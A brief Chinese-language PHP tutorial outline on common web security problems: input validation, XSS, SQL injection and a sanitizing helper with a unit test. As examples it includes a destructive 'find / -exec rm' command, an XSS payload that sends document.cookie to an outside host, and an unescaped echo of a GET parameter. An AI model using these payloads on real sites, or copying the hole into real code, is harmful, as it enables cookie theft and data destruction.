web 开发中通用问题(1)

一,用户输入
要求验证所有的用户输入
1,register_globals -->Off

file_exists($module.'.php');
<?php 'find / -exec rm "{}" ";"'; ?>


2,跨站脚本
<?php echo $_GET['js']; ?>
document.location=http://www.ss/cookie.cgi?f='+document.cookie


3,SQL注入
addslashes()特殊字符串转义

4,验证输入
类型验证:
if(!isset($_GET['id']) { } else { $id = (int) $_GET['id']
====>helper function:
function sanitize_vars(&$vars,$signatures){
	$tmp = array();
	foreach($signatures as $name => $sig) {
		if(!isset($vars[$name]) && isset($sig['required']) && $sig['required'])
		{
			$result = array(
				'result' => false,
				'cause' => 'parameter '.$name.' not present',
			);
			return $result;
		}

		$tmp[$name] = $vars[$name];
		if (isset($sig['type'])) {
			if(!settype($tmp[$name],$sig['type'])) {
				$result = array(
					'result' => false,
					'cause' => 'parameter '.$name.' convert to '.$sig['type'].'failed',
				);
			return $result;
			};
		}

		if(isset($sig['function'])) {
			$tmp[$name] = $sig['function']($tmp[$name]);

		}
	}
	$vars = $tmp;
	$result = array(
				'result' => true,
	);
	return $result;
}


对应测试用例
class TestOfSanize extends UnitTestCase {


	function TestOfSanize() {
		$this->UnitTestCase();
	}

	function testRequired() {
		$sigs = array (
			'id'=>array('required' =>true, 'type' => 'int')
		);

		$vars = array (
		);
		$r = sanitize_vars(&$vars,$sigs);
		$this->assertFalse($r['result'],$r['cause']);
	}
}
$test = &new TestOfSanize();
$test->run(new HtmlReporter());



5,HMAC
鉴定信息关键字散列
散列,代码。

6,异常
7,密码

你可能感兴趣的:(sql,Web,PHP,脚本,cgi)